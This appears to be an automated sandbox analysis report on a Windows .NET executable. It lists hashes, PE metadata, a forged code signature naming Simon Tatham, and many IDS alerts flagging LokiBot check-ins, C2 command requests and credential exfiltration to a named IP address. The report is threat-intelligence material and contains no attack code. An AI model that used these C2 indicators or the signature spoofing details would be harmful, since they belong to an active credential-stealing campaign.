                                            SHA1:7bca83400323c71ee5bd1d655004a4a762e1c71b
                                            SHA256:857fd5543f14e01ea3b08d3aca6ee6763042a48d7b04c9f035a4a37a4d2e0039
                                            SHA512:d8d8f885f172cac4f47ffeb934f4b2ba076aedbe86851d96e7e410ba18b3ecaa1b9448e87f699de4069909ba5debb34ecd3065465e4aaf2a22106050eccf253d
                                            SSDEEP:12288:4YqnHvjNIrpf9rN/mc/C/7rFps1mv2XlOZPAgK711pwLKnJLqzLYskR:41PjKr5BNDQ7rF6BOZYgK7OYJLkLS
                                            TLSH:37E412217378D673C7B05BB444BC94F5ABF5B1912A29E6DD0DE0608E2AF0B80AF15763
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+f..............0..X...6.......w... ........@.. ....................................@................................
                                            Icon Hash:49598b8999894929
                                            Entrypoint:0x4a77ae
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x662B08CC [Fri Apr 26 01:52:12 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Signature Valid:false
                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                            Subject Chain
                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                            Version:3
                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            cmp byte ptr [edi+38h], cl
                                            pop edx
                                            xor eax, 50374856h
                                            xor al, 00h
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [ecx+42h], al
                                            cmp byte ptr [esp+esi+51h], dl
                                            cmp byte ptr [ecx+4Fh], dl
                                            inc esp
                                            push ebp
                                            inc ebp
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa775c0x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x3204.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xa90000x3608
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xa57d40xa58006650a153d4aec5b8f828cc245664de56False0.9293659129531722data7.959447927229037IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xa80000x32040x340005ac60d846e661d7b5ec2666d4610a5dFalse0.8815354567307693data7.559708842187755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xac0000xc0x200d1cfb80115234bf21b56485b3eabc824False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xa80c80x2d07PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9655591220612475
                                            RT_GROUP_ICON0xaade00x14data1.05
                                            RT_VERSION0xaae040x3fcdata0.4284313725490196
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            04/26/24-04:42:41.660723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.445.77.223.48
                                            04/26/24-04:42:37.043735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.445.77.223.48
                                            04/26/24-04:43:38.519329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.445.77.223.48
                                            04/26/24-04:42:41.660723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.445.77.223.48
                                            04/26/24-04:42:20.116742TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.445.77.223.48
                                            04/26/24-04:42:46.212974TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.445.77.223.48
                                            04/26/24-04:43:21.940707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.445.77.223.48
                                            04/26/24-04:43:40.002816TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.445.77.223.48
                                            04/26/24-04:43:01.472637TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.445.77.223.48
                                            04/26/24-04:42:43.312556TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.445.77.223.48
                                            04/26/24-04:43:17.632927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.445.77.223.48
                                            04/26/24-04:42:46.212974TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.445.77.223.48
                                            04/26/24-04:43:21.940707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.445.77.223.48
                                            04/26/24-04:42:05.836233TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.445.77.223.48
                                            04/26/24-04:43:13.266385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.445.77.223.48
                                            04/26/24-04:43:08.959356TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.445.77.223.48
                                            04/26/24-04:42:10.160803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.445.77.223.48
                                            04/26/24-04:42:55.707371TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.445.77.223.48
                                            04/26/24-04:42:12.565966TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.445.77.223.48
                                            04/26/24-04:42:57.146160TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.445.77.223.48
                                            04/26/24-04:42:04.426692TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.445.77.223.48
                                            04/26/24-04:42:10.160803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.445.77.223.48
                                            04/26/24-04:42:55.707371TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.445.77.223.48
                                            04/26/24-04:42:29.146660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.445.77.223.48
                                            04/26/24-04:43:02.891159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.445.77.223.48
                                            04/26/24-04:43:41.435996TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.445.77.223.48
                                            04/26/24-04:42:29.146660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.445.77.223.48
                                            04/26/24-04:43:16.174844TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.445.77.223.48
                                            04/26/24-04:42:08.768305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.445.77.223.48
                                            04/26/24-04:42:32.693379TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.445.77.223.48
                                            04/26/24-04:43:23.393350TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.445.77.223.48
                                            04/26/24-04:43:30.595490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.445.77.223.48
                                            04/26/24-04:43:19.056808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.445.77.223.48
                                            04/26/24-04:43:10.461205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.445.77.223.48
                                            04/26/24-04:43:52.043341TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.445.77.223.48
                                            04/26/24-04:43:14.708232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.445.77.223.48
                                            04/26/24-04:43:05.708325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.445.77.223.48
                                            04/26/24-04:43:27.753457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.445.77.223.48
                                            04/26/24-04:43:19.056808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.445.77.223.48
                                            04/26/24-04:43:42.908989TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.445.77.223.48
                                            04/26/24-04:43:10.461205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.445.77.223.48
                                            04/26/24-04:42:44.797094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.445.77.223.48
                                            04/26/24-04:42:21.613500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.445.77.223.48
                                            04/26/24-04:42:49.953966TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.445.77.223.48
                                            04/26/24-04:42:26.179565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.445.77.223.48
                                            04/26/24-04:42:49.953966TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.445.77.223.48
                                            04/26/24-04:42:26.179565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.445.77.223.48
                                            04/26/24-04:42:35.607137TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.445.77.223.48
                                            04/26/24-04:43:26.329932TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.445.77.223.48
                                            04/26/24-04:43:00.052049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.445.77.223.48
                                            04/26/24-04:43:24.904349TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.445.77.223.48
                                            04/26/24-04:43:29.172203TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.445.77.223.48
                                            04/26/24-04:42:47.670237TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.445.77.223.48
                                            04/26/24-04:42:18.687770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.445.77.223.48
                                            04/26/24-04:43:07.513137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.445.77.223.48
                                            04/26/24-04:42:14.041821TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.445.77.223.48
                                            04/26/24-04:42:18.687770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.445.77.223.48
                                            04/26/24-04:42:24.705958TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.445.77.223.48
                                            04/26/24-04:42:14.041821TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.445.77.223.48
                                            04/26/24-04:42:34.173942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.445.77.223.48
                                            04/26/24-04:43:00.052049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.445.77.223.48
                                            04/26/24-04:42:02.935480TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.445.77.223.48
                                            04/26/24-04:42:58.597395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.445.77.223.48
                                            04/26/24-04:42:08.768305TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.445.77.223.48
                                            04/26/24-04:42:58.597395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.445.77.223.48
                                            04/26/24-04:43:07.513137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.445.77.223.48
                                            04/26/24-04:42:41.660723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.445.77.223.48
                                            04/26/24-04:43:19.056808TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.445.77.223.48
                                            04/26/24-04:43:42.908989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.445.77.223.48
                                            04/26/24-04:43:21.940707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.445.77.223.48
                                            04/26/24-04:42:52.847994TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.445.77.223.48
                                            04/26/24-04:43:04.288590TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.445.77.223.48
                                            04/26/24-04:42:07.242464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.445.77.223.48
                                            04/26/24-04:42:07.242464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.445.77.223.48
                                            04/26/24-04:43:34.068335TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.445.77.223.48
                                            04/26/24-04:43:17.632927TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.445.77.223.48
                                            04/26/24-04:43:44.358398TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.445.77.223.48
                                            04/26/24-04:42:38.508836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.445.77.223.48
                                            04/26/24-04:43:35.596260TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.445.77.223.48
                                            04/26/24-04:43:13.266385TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.445.77.223.48
                                            04/26/24-04:42:38.508836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.445.77.223.48
                                            04/26/24-04:42:23.188583TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.445.77.223.48
                                            04/26/24-04:43:11.850756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.445.77.223.48
                                            04/26/24-04:42:20.116742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.445.77.223.48
                                            04/26/24-04:43:42.908989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.445.77.223.48
                                            04/26/24-04:43:20.496255TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.445.77.223.48
                                            04/26/24-04:42:17.251353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.445.77.223.48
                                            04/26/24-04:43:30.595490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.445.77.223.48
                                            04/26/24-04:43:45.956580TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.445.77.223.48
                                            04/26/24-04:42:02.935480TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.445.77.223.48
                                            04/26/24-04:43:30.595490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.445.77.223.48
                                            04/26/24-04:43:11.850756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.445.77.223.48
                                            04/26/24-04:42:17.251353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.445.77.223.48
                                            04/26/24-04:42:51.405219TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.445.77.223.48
                                            04/26/24-04:43:14.708232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.445.77.223.48
                                            04/26/24-04:43:01.472637TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.445.77.223.48
                                            04/26/24-04:43:05.708325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.445.77.223.48
                                            04/26/24-04:42:46.212974TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.445.77.223.48
                                            04/26/24-04:43:05.708325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.445.77.223.48
                                            04/26/24-04:42:57.146160TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.445.77.223.48
                                            04/26/24-04:42:57.146160TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.445.77.223.48
                                            04/26/24-04:42:35.607137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.445.77.223.48
                                            04/26/24-04:42:39.893817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.445.77.223.48
                                            04/26/24-04:42:44.797094TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.445.77.223.48
                                            04/26/24-04:42:05.836233TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.445.77.223.48
                                            04/26/24-04:42:10.160803TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.445.77.223.48
                                            04/26/24-04:42:44.797094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.445.77.223.48
                                            04/26/24-04:42:54.249806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.445.77.223.48
                                            04/26/24-04:42:26.179565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.445.77.223.48
                                            04/26/24-04:42:54.249806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.445.77.223.48
                                            04/26/24-04:43:01.472637TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.445.77.223.48
                                            04/26/24-04:42:49.953966TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.445.77.223.48
                                            04/26/24-04:43:40.002816TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.445.77.223.48
                                            04/26/24-04:42:04.426692TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.445.77.223.48
                                            04/26/24-04:42:15.814851TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.445.77.223.48
                                            04/26/24-04:43:14.708232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.445.77.223.48
                                            04/26/24-04:43:44.358398TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.445.77.223.48
                                            04/26/24-04:43:24.904349TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.445.77.223.48
                                            04/26/24-04:43:48.980951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.445.77.223.48
                                            04/26/24-04:43:24.904349TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.445.77.223.48
                                            04/26/24-04:42:24.705958TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.445.77.223.48
                                            04/26/24-04:42:27.665907TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.445.77.223.48
                                            04/26/24-04:43:47.482327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.445.77.223.48
                                            04/26/24-04:42:18.687770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.445.77.223.48
                                            04/26/24-04:43:50.432496TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.445.77.223.48
                                            04/26/24-04:43:16.174844TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.445.77.223.48
                                            04/26/24-04:42:37.043735TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.445.77.223.48
                                            04/26/24-04:43:27.753457TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.445.77.223.48
                                            04/26/24-04:42:34.173942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.445.77.223.48
                                            04/26/24-04:42:24.705958TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.445.77.223.48
                                            04/26/24-04:42:58.597395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.445.77.223.48
                                            04/26/24-04:43:41.435996TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.445.77.223.48
                                            04/26/24-04:43:47.482327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.445.77.223.48
                                            04/26/24-04:43:38.519329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.445.77.223.48
                                            04/26/24-04:42:14.041821TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.445.77.223.48
                                            04/26/24-04:42:34.173942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.445.77.223.48
                                            04/26/24-04:43:07.513137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.445.77.223.48
                                            04/26/24-04:42:27.665907TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.445.77.223.48
                                            04/26/24-04:42:32.693379TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.445.77.223.48
                                            04/26/24-04:42:14.041821TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.445.77.223.48
                                            04/26/24-04:42:29.146660TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.445.77.223.48
                                            04/26/24-04:42:27.665907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.445.77.223.48
                                            04/26/24-04:42:32.693379TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.445.77.223.48
                                            04/26/24-04:43:42.908989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.445.77.223.48
                                            04/26/24-04:42:23.188583TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.445.77.223.48
                                            04/26/24-04:42:34.173942TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.445.77.223.48
                                            04/26/24-04:43:14.708232TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.445.77.223.48
                                            04/26/24-04:42:12.565966TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.445.77.223.48
                                            04/26/24-04:42:12.565966TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.445.77.223.48
                                            04/26/24-04:42:07.242464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.445.77.223.48
                                            04/26/24-04:42:55.707371TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.445.77.223.48
                                            04/26/24-04:43:26.329932TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.445.77.223.48
                                            04/26/24-04:42:47.670237TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.445.77.223.48
                                            04/26/24-04:43:21.940707TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.445.77.223.48
                                            04/26/24-04:43:34.068335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.445.77.223.48
                                            04/26/24-04:42:47.670237TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.445.77.223.48
                                            04/26/24-04:42:49.953966TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.445.77.223.48
                                            04/26/24-04:42:38.508836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.445.77.223.48
                                            04/26/24-04:43:00.052049TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.445.77.223.48
                                            04/26/24-04:43:04.288590TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.445.77.223.48
                                            04/26/24-04:43:52.043341TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.445.77.223.48
                                            04/26/24-04:42:20.116742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.445.77.223.48
                                            04/26/24-04:42:17.251353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.445.77.223.48
                                            04/26/24-04:43:11.850756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.445.77.223.48
                                            04/26/24-04:43:52.043341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.445.77.223.48
                                            04/26/24-04:43:20.496255TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.445.77.223.48
                                            04/26/24-04:42:41.660723TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.445.77.223.48
                                            04/26/24-04:42:20.116742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.445.77.223.48
                                            04/26/24-04:43:20.496255TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.445.77.223.48
                                            04/26/24-04:42:02.935480TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973580192.168.2.445.77.223.48
                                            04/26/24-04:42:58.597395TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.445.77.223.48
                                            04/26/24-04:43:23.393350TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.445.77.223.48
                                            04/26/24-04:43:07.513137TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.445.77.223.48
                                            04/26/24-04:42:02.935480TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973580192.168.2.445.77.223.48
                                            04/26/24-04:43:50.432496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.445.77.223.48
                                            04/26/24-04:42:57.146160TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.445.77.223.48
                                            04/26/24-04:43:23.393350TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.445.77.223.48
